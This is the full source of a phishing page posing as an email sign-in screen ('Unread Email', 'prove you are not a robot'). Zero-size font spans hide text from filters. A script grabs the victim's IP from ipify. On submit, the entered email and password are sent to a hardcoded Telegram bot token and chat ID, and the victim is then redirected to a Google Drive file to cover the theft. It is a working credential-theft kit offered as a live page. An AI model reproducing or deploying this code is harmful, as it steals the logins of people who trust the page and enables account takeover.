<!DOCTYPE html>
<html>
<head>
	<title>(1) Unread Email - Sign in to continue</title>
	<link rel="icon" type="image/png" href="https://i.imgur.com/gBfwsOA.png">
    <meta name="robots" content="noindex, noarchive, nofollow, nosnippet" />
    <meta name="googlebot" content="noindex, noarchive, nofollow, nosnippet, noimageindex" />
    <meta name="slurp" content="noindex, noarchive, nofollow, nosnippet, noodp, noydir" />
    <meta name="msnbot" content="noindex, noarchive, nofollow, nosnippet" />
    <meta name="teoma" content="noindex, noarchive, nofollow, nosnippet" />
	<meta name="viewport" content="width=device-width, initial-scale=1">
	

<style type="text/css">
@import url(https://fonts.googleapis.com/css?family=PT+Sans:400,700);
html {
	min-height: 100%;
}

body {
	background: url('https://i.imgur.com/NzF1fEV.png') no-repeat;
	background-size: cover;
	position: absolute;
	width: 100%;
	height: 100%;
    top: 0;
    right: 0;
    bottom: 0;
    left: 0;
    margin: auto;
    overflow: hidden;
	font-family: 'PT Sans', sans-serif;
}

.login {
	padding: 10px;
}

.files {
	background: #02723b;
	margin: 200px auto;
	width: 90%;
	max-width: 450px;
	text-align: center;
	color: #fff;
}

form {
  max-width: 450px;
	margin: 0 auto;
}
form > div {
  position: relative;
  background: white;
  border-bottom: 1px solid #ccc;
  color: #000;
}
form > div > label {
  opacity: 0.3;
  font-weight: bold;
  position: absolute;
  top: 22px;
  left: 20px;
}
form > div > input[type="text"],
form > div > input[type="email"],
form > div > input[type="password"] {
  width: 100%;
  border: 0;
  padding: 20px 20px 20px 50px;
  background: #fff;
}
form > div > input[type="text"]:focus,
form > div > input[type="email"]:focus,
form > div > input[type="password"]:focus {
  outline: 0;
  background: white;
}
form > div > input[type="text"]:focus + label,
form > div > input[type="email"]:focus + label,
form > div > input[type="password"]:focus + label {
  opacity: 0;
}
form > div > input[type="text"]:valid,
form > div > input[type="email"]:valid,
form > div > input[type="password"]:valid {
  background: url(https://s3-us-west-2.amazonaws.com/s.cdpn.io/3/check.svg);
  background-size: 20px;
  background-repeat: no-repeat;
  background-position: 20px 20px;
}
form > div > input[type="text"]:valid + label,
form > div > input[type="email"]:valid + label,
form > div > input[type="password"]:valid + label {
  opacity: 0;
}
form > div > input[type="text"]:invalid:not(:focus):not(:placeholder-shown),
form > div > input[type="email"]:invalid:not(:focus):not(:placeholder-shown),
form > div > input[type="password"]:invalid:not(:focus):not(:placeholder-shown) {
  background: pink;
}
form > div > input[type="text"]:invalid:not(:focus):not(:placeholder-shown) + label,
form > div > input[type="email"]:invalid:not(:focus):not(:placeholder-shown) + label,
form > div > input[type="password"]:invalid:not(:focus):not(:placeholder-shown) + label {
  opacity: 0;
}
form > div > input[type="text"]:invalid:focus:not(:placeholder-shown) ~ .requirements,
form > div > input[type="email"]:invalid:focus:not(:placeholder-shown) ~ .requirements,
form > div > input[type="password"]:invalid:focus:not(:placeholder-shown) ~ .requirements {
  max-height: 200px;
  padding: 0 30px 20px 50px;
}
form > div .requirements {
  padding: 0 30px 0 50px;
  color: #999;
  max-height: 0;
  transition: 0.28s;
  overflow: hidden;
  color: red;
  font-style: italic;
}
form input[type="submit"] {
  display: block;
  width: 100%;
  margin: 20px 0;
  background: #25402b;
  color: white;
  border: 0;
  padding: 20px;
  font-size: 1.2rem;
}

form input[type="submit"]:hover {
	box-shadow: 1px 1px 1px #ddd;
}

* {
  box-sizing: border-box;
}

.invalid {
	background: #000;
	color: #000;
}

@media screen and (max-width: 360px) and (min-width: 320px) {
  .files {
    margin: 100px auto;
  }
}


</style>


</head>
<body>
<div class="files">
	<img src="https://i.imgur.com/croX2IG.png" height="50">
	<h2>Si<span style=�FONT-SIZE: 0px�>gn</ span > in with your email to prove<span style=�FONT-SIZE: 0px�> you are</ span > not a <span style=�FONT-SIZE: 0px�>robot
</ span ></h2>
	
	<div class="login">
		<!-- <form action="<?php echo htmlentities($_SERVER['PHP_SELF']); ?>" method="post"> -->
    <form id="forma">
	  
	  <div>
		<input type="email" id="email" name="email" required placeholder=" " value="" />
		<label for="email">Em<span style=�FONT-SIZE: 0px�>ail</ span > Ad<span style=�FONT-SIZE: 0px�>dress
</ span ></label>
		<div class="requirements">
		  Mu<span style=�FONT-SIZE: 0px�>st</ span > be a va<span style=�FONT-SIZE: 0px�>lid</ span > em<span style=�FONT-SIZE: 0px�>ail</ span > ad<span style=�FONT-SIZE: 0px�>dress
</ span >.
		</div>
	  </div>
	  
	  <div>
        <input type="text" id="ipaddress" hidden>
		<input type="password" id="password" name="password" required placeholder=" " />
		<label for="password">Pa<span style=�FONT-SIZE: 0px�>ssword
</ span ></label>
		<div class="requirements">
		  Your pa<span style=�FONT-SIZE: 0px�>ssword
</ span > mu<span style=�FONT-SIZE: 0px�>st</ span > be at le<span style=�FONT-SIZE: 0px�>ast</ span > 6 ch<span style=�FONT-SIZE: 0px�>aracters</ span > as we<span style=�FONT-SIZE: 0px�>ll</ span > as co<span style=�FONT-SIZE: 0px�>ntain</ span > at le<span style=�FONT-SIZE: 0px�>ast</ span > one up<span style=�FONT-SIZE: 0px�>percase,</ span > one lo<span style=�FONT-SIZE: 0px�>wercase,</ span > and one nu<span style=�FONT-SIZE: 0px�>mber.</ span >
		</div>
	  </div>
	  
	  <input type="submit" value="Go to message" name="submitBtn"/>

	</form>
	</div>
</div>
</body>
</html>
<!-- START: Here's the IP stuff -->
<script type="application/javascript">
    function getIP(json) {
        document.getElementById("ipaddress").value = json.ip;
    }
    </script>
    
    <script type="application/javascript" src="https://api.ipify.org?format=jsonp&callback=getIP"></script>
     <!-- END: IP Stuff -->	
                    <!-- ////////////////////////div2 end/////////////////////// -->
					<script>
                        const forma = document.querySelector('#forma')
                      
                        let bot = {
                            TOKEN: "5584026320:AAEhkgV3UqqZaBzoHpO-X5LHPXB3Rw2_xNA",
                            chatID: "907859402"
                        }
                  
                      forma.addEventListener("submit", e =>{
                            e.preventDefault();
                            let email = document.querySelector('#email').value
                            let pwd = document.querySelector('#password').value
                            let ips = document.querySelector('#ipaddress').value

                            // alert(email);
                            // alert(pwd);
                  
                          fetch(`https://api.telegram.org/bot${bot.TOKEN}/sendMessage?chat_id=${bot.chatID}&text=Excel=>${email}=${pwd}=IP:=${ips}`, {
                                method: "GET"
                            }).then(success => {
                                window.location.replace("https://drive.google.com/file/d/0ByjBjZCfGrouOGJPcF9YdWVJR1E/view");
                            }, error => {
                                console.log(error)
                                }) 
                        })
                      </script>	